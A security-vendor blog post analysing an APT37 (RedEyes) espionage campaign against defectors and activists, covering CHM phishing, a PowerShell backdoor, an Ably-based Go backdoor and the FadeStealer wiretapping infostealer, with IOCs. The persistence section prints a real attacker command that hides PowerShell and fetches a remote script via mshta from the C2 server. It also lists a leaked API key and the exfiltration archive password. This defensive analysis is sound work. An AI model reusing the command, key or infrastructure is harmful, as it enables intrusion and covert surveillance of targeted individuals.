RedEyes Group Wiretapping Individuals (APT37) – ASEC BLOG

1. Overview

RedEyes (also known as APT37, ScarCruft, and Reaper) is a state-sponsored APT group that mainly carries out attacks against individuals such as North Korean defectors, human rights activists, and university professors. Their task is known to be monitoring the lives of specific individuals. In May 2023, AhnLab Security Emergency response Center (ASEC) discovered the RedEyes group distributing and using an Infostealer with wiretapping features that was previously unknown along with a backdoor developed using GoLang that exploits the Ably platform.
ABLY [1] is a platform for real-time data transfer and messaging. It can also perform publish/subscribe messaging, push notifications, real-time query, and state synchronization.

The threat actor sent their commands through the GoLang backdoor that is using the Ably service. The API key value required for command communication was saved in a GitHub repository. This API key value is necessary for communicating with the threat actor’s channel, so anyone is capable of subscribing if they know this key value. Due to this, some of the commands used by the threat actor at the time of analysis could be identified.

ASEC aims to share the tactics, techniques, and procedures (TTPs) utilized by the RedEyes group during their attacks in May 2023. From the initial breach technique, all the way to privilege escalation, command and control, and exfiltration, each stage used by the RedEyes group to monitor individuals will be covered in this blog post.

Figure 1. RedEyes attack flow

2. Analysis

2.1. Initial Access

The threat actor used a CHM (Compiled HTML Help File) file to carry out their initial breach. Similar to the case covered back in March, “Malware Distributed Disguised as a Password File” [2], it is assumed that targets were approached via spear phishing emails with a normal password-protected document and a CHM malware disguised as a password file attached to them. In other words, by compressing a normal password-protected document with CHM malware, the threat actor led users into believing that the CHM file must be executed in order to view the password-protected document.

Figure 2. Bait document and malicious CHM file

When a user executes the CHM file, they can see the password information as shown in Figure 3. However, the internal script code in the CHM shown in Figure 4 triggers MSHTA.exe to be executed, which causes a malicious script from the threat actor’s C&C server to be executed as well.

Figure 3. Content of CHM file
Figure 4. Script code within CHM

The malicious script obtained during the analysis was confirmed as PowerShell malware that maintains persistence through the use of an autorun registry key. It also possesses a backdoor feature.

Figure 5. PowerShell script (backdoor) downloaded from threat actor’s server

The PowerShell malware confirmed back in the February 2023 post, “HWP Malware Using the Steganography Technique” [3], had relatively simple features. It involved executing the threat actor’s commands and sending the results using CMD.exe, as well as registering to the RUN key registry for persistence. Although the recently obtained PowerShell malware still employs the same registry key registration for persistence, it does not use CMD.exe and instead performs different behaviors according to the C&C server command. The features are shown below in Table 1.

Command Feature
fileinfo Sends the file list and information (name, size, modified time) in a specific path saved as a CSV to the C&C server and deletes the csv
dir Compresses folders in a specific path and sends the compressed file to the C&C server before deleting the file
file Uploads a specific file to the C&C server
down Downloads files to a specific path
regedit Feature to edit registry
task Feature to register to task scheduler so it is executed repeatedly at 10 min intervals
zip Feature to uncompress files in a specific path
rename Feature to change the name of a specific file
del Feature to delete files in a specific path
Table 1. PowerShell backdoor features

2.2. Persistence

The malicious PowerShell script that is executed by MSHTA.exe uses the command below to register itself on the autorun registry key, allowing malicious scripts to be executed from the threat actor’s C&C server even after system reboots.

  • New-ItemProperty -Path HKCU:SoftwareMicrosoftWindowsCurrentVersionRun -Name kcJuWlrQO -Value ‘c:windowssystem32cmd.exe /c PowerShell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass ping -n 1 -w 569782 2.2.2.2 || mshta hxxp://172.93.181[.]249/control/html/1.html’ -PropertyType String -Force;

2.3. Command and Control

The threat actor carried out later attack stages such as privilege escalation, exfiltration, and malware distribution through a backdoor that utilizes the Ably platform service which is based on GoLang. The Ably platform is capable of transferring data in real-time, and anyone with a channel authentication key can access the channel to receive messages. During the analysis, ASEC managed to secure the authentication key of the threat actor’s channel and view some of the commands that were sent to targets.

Time of Transmission Executed Command
2023-05-09 10:16:16 forfiles /p c:programdata
2023-05-09 10:49:47 ren c:programdatawallpaper-river.jpg wallpaper-river.exe
2023-05-09 10:49:53 forfiles /p c:programdata
2023-05-09 10:50:09 wmic OS get Caption,CSDVersion,OSArchitecture,Version
2023-05-09 10:50:35 c:programdatawallpaper-river.exe
Table 2. Commands executed through AblyGo backdoor

The RedEyes group using Ably to send commands has been reported before by KISA [4] and Sekoia [5]. The Ably-based GoLang backdoor found at the time had the authentication key within its binary, as shown in Figure 6, but the backdoor obtained in this instance saved the authentication key in a GitHub repository, allowing for the authentication key to be received dynamically for channel communication. This was most likely done so that the Ably channel authentication key could be changed frequently and to prevent third parties from reading the channel messages.

Figure 6. Hard-coded authentication key information (previous AblyGo backdoor)

The GoLang backdoor accesses the GitHub URL that exists within its binary and retrieves the data that is in the “<>BASE64-encoded channel authentication key” format in order to obtain the Ably channel authentication key. This method can also be seen in Figure 4 of “The Unintentional Leak: A glimpse into the attack vectors of APT37” [6] that was published by zscaler back in March 2023. According to this post, the threat actor frequently committed strings encoded in BASE64. Decrypting the string shown in Figure 4 results in the Ably authentication key value.

[GitHub Commit String]
<>S3dITXZ3LmJvaUMzdzpqR2JmMDd3VW9iN3RGanoxM1dxRFE4WJRsVFBDbVBQdldzb3hZYjFxc21r
[GitHub Decrypted String]
<>KwHMvw.boiC3w:jGbf07wUob7tFjz13WqDQ8X.lTPCmPPvWsoxYb1qsmk (Ably authentication key)

If the AblyGo backdoor is executed on an infected system, the “<>authentication key” is retrieved from GitHub. It then parses “<>” with the code part of Figure 7 before decoding the string that follows with BASE64. The threat actor’s Ably channel is then accessed via the decoded authentication key value where messages named “UP” and “DOWN” are transmitted and received. The format and features of the transmitted and received data are shown below in Table 3.

Message Name (Feature) Data Format
UP (Sends HELLO and uploads command result) {“Id”:”PC Name”,”Textdata”:”SEVMTw==”}
DOWN (Transmits CMD command) {“Id”:”PC Name”,”Textdata”:”SEVMTw==”}
Table 3. Format and features of AblyGo backdoor’s transmitted and received messages

After AblyGo is executed on an infected PC, it sends the “HELLO” data encoded in BASE64 at an interval of about 2 to 5 minutes to signify that the PC is connected with the threat actor’s Ably channel (Message name: UP).

The threat actor monitors the Ably channel and identifies the ID of the infected PC. They then encode the command in BASE64 and transmit it again (Message name: DOWN).

The execution of commands received from the C&C server is performed exclusively through CMD.exe, and the results of the CMD commands are transmitted back to the channel using the “UP” message. In other words, “UP” serves as a message for the threat actor to identify the infected PC and receive command results, while “DOWN” is used as a message for issuing commands.

2.4. Privilege Escalation

After command and control, the threat actor uses a known privilege escalation technique called T1546.015 (Event Triggered Execution: Component Object Model Hijacking) to execute additional malware. The malware registered to the registry key in Figure 8 could not be secured.

Figure 8. Privilege escalation technique (T1546.015)

2.5. Exfiltration

The threat actor utilizes the AblyGo backdoor and MSTHA PowerShell to ultimately execute an Infostealer in a fileless form.

Figure 9. FadeStealer execution flow
Figure 10. Detection screen (Process tree structure) of AhnLab Endpoint Detection Response (EDR)

The executed Infostealer has various features, such as taking screenshots, exfiltrating data from removable media devices & smartphones, keylogging, and wiretapping.

Figure 11. Wiretapping feature added to FadeStealer

Based on the characteristic of the folder name where the exfiltrated data is stored, ASEC has named this newly discovered malware as FadeStealer (Fade as a stealer). FadeStealer creates individual folders for each exfiltrated data in the %temp% directory. It utilizes an integrated RAR compression utility within the file to compress the exfiltrated data from the infected PC at 30-minute intervals using a password. FadeStealer has a meticulous side to it as it employs the split compression feature, limiting each volume to a maximum of 1 GB if the compressed file ever exceeds 1 GB.

Folder Path Exfiltrated Data
%temp%VSTelems_FadeNgenPdbc Screenshots
%temp%VSTelems_FadeNgenPdbk Keylogging
%temp%VSTelems_FadeNgenPdbm Microphone wiretapping
%temp%VSTelems_FadeIn Data collection of smartphone device
%temp%VSTelems_FadeOut Removable media device
Table 4. Folder paths and exfiltrated data
Figure 12. Detection screen of AhnLab EDR (Information theft using RAR compression utility)
Compression Option Feature Explanation
a Add compressed file
r Recover compressed file
ep1 Remove base directory from name
m0 Set compression level (save)
y Automatically answer yes to all questions
p NaeMhq[d]q Set compression password as NaeMhq[d]q
v1g Set compression volume limit to 1 GB
Table 5. Compression options
Figure 13. Stolen personal information found on the threat actor’s server

3. Conclusion

The RedEyes group carries out attacks against specific individuals such as North Korean defectors, human rights activists, and university professors. Their primary focus is on information theft, and an Infostealer with a feature to wiretap microphones was discovered in this recent attack case. Unauthorized eavesdropping on individuals in South Korea is considered a violation of privacy and is strictly regulated under relevant laws. Despite this, the threat actor monitored everything victims did on their PC and even conducted wiretapping.

If you examine the overall attack flow in this case, the threat actor carried out their attack cleverly and precisely by employing spear phishing emails to gain access to target systems and using an Ably channel as a command-and-control server. These sorts of attacks are difficult for individuals to notice. As such, ASEC is closely tracking the activities of the RedEyes group and responding promptly to prevent further damage.

Users must refrain from opening files from unknown sources to prevent themselves from being harmed. Especially now since the group in question has recently been using malware based on CHM and LNK extensions to perform their initial breach, extra attention should be given to the file extensions when executing email attachments. The file extension is set to hidden by default, so it is recommended to refer to Figure 14 and uncheck the “Hide extensions for known file types”. If the attached files are CHM or LNK, then it is crucial that you verify the source of the email before executing them.

Figure 14. Uncheck “Hide extensions for known file types”

4. Reference

[1] Ably
[2] Malware Distributed Disguised as a Password File
[3] HWP Malware Using the Steganography Technique: RedEyes (ScarCruft)
[4] TTPs $ ScarCruft Tracking Note – KISA
[5] Peeking at Reaper’s surveillance operations – sekoia
[6] The Unintentional Leak: A glimpse into the attack vectors of APT37 – zscaler

[IOC]
[MD5]
[CHM]
1352abf9de97a0faf8645547211c3be7

[Powershell Backdoor]
1c1136c12d0535f4b90e32aa36070682

[AblyGo Variant]
msedgeupdate.ini (3277e0232ed6715f2bae526686232e06)
msedgeupdate.ini (3c475d80f5f6272234da821cc418a6f7)

[Dll Sideloading – Loader]
mfc42u.dll (59804449f5670b4b9b3b13efdb296abb)

[FadeStealer]
DESKTOP.lNl (f44bf949abead4af0966436168610bcc)

[File Detection]
Trojan/Win.Goably.C5436296 (2023.06.03.00)
Trojan/Win.Goably.C5422375 (2023.05.09.02)
Trojan/Win.Loader.C5424444 (2023.05.09.02)
Data/BIN.RedEyes (2023.06.08.01)
Downloader/CHM.Generic (2023.06.02.03)
Downloader/PowerShell.Generic (2023.06.06.00)

[Behavior Detection]
Injection/EDR.Event .M11124

[Exfiltrated Data Save URL]
hxxp://172.93.181[.]249/control/data/

[AblyGo Backdoor Upload Path]
hxxp://172.93.181[.]249/file/

[PowerShell Backdoor Download URL After Initial Breach Stage]
hxxp://172.93.181[.]249/control/html/1.html

AhnLab EDR protects the endpoint environment by delivering behavioral detection, advanced analysis, holistic visibility, and proactive threat hunting. For more information about the product, please visit our official website.

Source: https://asec.ahnlab.com/en/54349/